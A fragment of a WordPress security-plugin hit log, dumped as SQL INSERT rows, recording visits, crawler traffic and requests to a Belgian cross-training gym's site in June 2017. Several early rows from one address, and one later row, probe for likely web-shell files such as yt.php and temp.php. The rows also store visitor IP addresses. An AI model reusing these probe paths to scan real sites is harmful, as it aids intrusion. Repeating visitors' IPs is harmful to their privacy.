(75775, 1497987551.933132, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/uploads/yt.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75776, 1497987860.643493, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-inde.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75777, 1497988099.723162, 3475901815, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75778, 1497988100.491227, 3475901815, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75779, 1497988271.861605, 2637637616, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75780, 1497988728.832455, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/images/yt.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75781, 1497989069.110332, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/yt2.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75782, 1497989217.899695, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/modules/modules/temp.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75783, 1497989464.638755, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/images/temp.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75784, 1497989725.542382, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/css/temp.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75785, 1497989791.293606, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/uploads/2017/05/yt.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75786, 1497990501.875933, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/yt.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75787, 1497990725.780904, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/temp.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75788, 1497999225.295554, 675805702, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/language/en-GB/language/en-GB/en-GB.xml', '', 'Googlebot/2.1 (+http://www.google.com/bot.html)'),
(75789, 1497999480.968003, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75790, 1498015873.812620, 2637637506, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75791, 1498015874.459089, 2637637506, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75792, 1498023471.138553, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75793, 1498023592.071006, 3350653525, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/Newspaper/readme.txt', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'),
(75794, 1498024222.593514, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75795, 1498028024.804463, 2783005766, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.ecosia.org/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75796, 1498028027.519141, 2783005766, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75797, 1498034740.987117, 3024883607, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75798, 1498035118.697294, 1600959772, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75799, 1498036252.652719, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75800, 1498036253.234998, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75801, 1498036253.818392, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75802, 1498036254.317207, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75803, 1498036254.866570, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75804, 1498036255.382512, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75805, 1498036255.971544, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75806, 1498036256.511237, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75807, 1498036257.056480, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75808, 1498036257.566889, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75809, 1498036258.112613, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75810, 1498036934.867625, 1137661233, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://www.majestic12.co.uk/bot.php?+)'),
(75811, 1498036935.906034, 1137661233, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://www.majestic12.co.uk/bot.php?+)'),
(75812, 1498036936.450109, 1137661233, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://www.majestic12.co.uk/bot.php?+)'),
(75813, 1498036999.980983, 2928290816, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133             Safari/537.36'),
(75814, 1498037520.085013, 3512712573, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(75815, 1498039589.828190, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75816, 1498041956.313734, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75817, 1498041957.868841, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75818, 1498041959.429842, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75819, 1498041961.204154, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75820, 1498041962.783920, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75821, 1498041964.370949, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75822, 1498041965.961290, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75823, 1498041967.533606, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75824, 1498041970.475002, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75825, 1498059007.983490, 1834596186, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75826, 1498067784.104348, 2025603832, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/error-log.php', 'http://crosstrainingcenter.be/wp-content/themes/error-log.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75827, 1498068077.818926, 1570674771, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75828, 1498068293.682480, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(75829, 1498068854.955430, 2499535434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(75830, 1498078023.251758, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75831, 1498078023.945067, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75832, 1498078024.439393, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75833, 1498078024.868159, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75834, 1498078025.494874, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75835, 1498078025.942768, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75836, 1498078026.363507, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75837, 1498078027.388541, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75838, 1498078027.810611, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75839, 1498078028.277469, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75840, 1498078028.730380, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75841, 1498078029.378857, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75842, 1498078029.985633, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75843, 1498078030.642644, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75844, 1498093744.139234, 3024883600, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75845, 1498105769.088505, 3657083672, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75846, 1498106943.307414, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75847, 1498106943.882055, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75848, 1498106944.321341, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75849, 1498106944.822134, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75850, 1498106945.310269, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75851, 1498106945.734092, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75852, 1498106946.148936, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75853, 1498106946.854563, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75854, 1498106947.259829, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75855, 1498106948.064389, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75856, 1498106949.218979, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75857, 1498106949.892718, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75858, 1498106950.332827, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75859, 1498106950.756336, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75860, 1498108030.595154, 2996488203, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75861, 1498120375.362209, 3281709424, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(75862, 1498124048.443746, 3024883470, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75863, 1498125027.773145, 3657083672, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75864, 1498129221.528006, 100556958, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_45_98) AppleWebKit/533.94.57 (KHTML, like Gecko) Chrome/57.5.0523.6895 Safari/530.64 Edge/34.60749'),
(75865, 1498129223.904386, 100556958, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_45_98) AppleWebKit/533.94.57 (KHTML, like Gecko) Chrome/57.5.0523.6895 Safari/530.64 Edge/34.60749'),
(75866, 1498133301.384989, 1837920118, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75867, 1498134358.193197, 3657083672, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75868, 1498135617.494934, 1170573314, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(75869, 1498136081.746942, 621375751, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75870, 1498146566.638971, 2637637428, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75871, 1498146905.736501, 2366148185, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75872, 1498146910.187148, 1570674722, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/1299398436.png', '', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)'),
(75873, 1498147930.487855, 1123634244, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75874, 1498147930.971408, 1123634244, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75875, 1498148154.205984, 3657083672, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75876, 1498149057.449134, 1464061315, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75877, 1498149059.215774, 1464061315, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75878, 1498149066.962445, 1464061315, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75879, 1498150685.863874, 3657083672, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75880, 1498151398.488798, 2366148131, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75881, 1498153955.164161, 3657083672, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75882, 1498156316.034688, 782305590, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(75883, 1498157822.737451, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(75884, 1498157823.190824, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75885, 1498157823.652215, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75886, 1498157824.089199, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75887, 1498157824.731647, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75888, 1498157825.328054, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75889, 1498157825.811902, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75890, 1498157826.257395, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75891, 1498157826.649990, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75892, 1498157827.058075, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75893, 1498157827.553063, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75894, 1498157828.001133, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75895, 1498157828.398553, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75896, 1498157828.793985, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
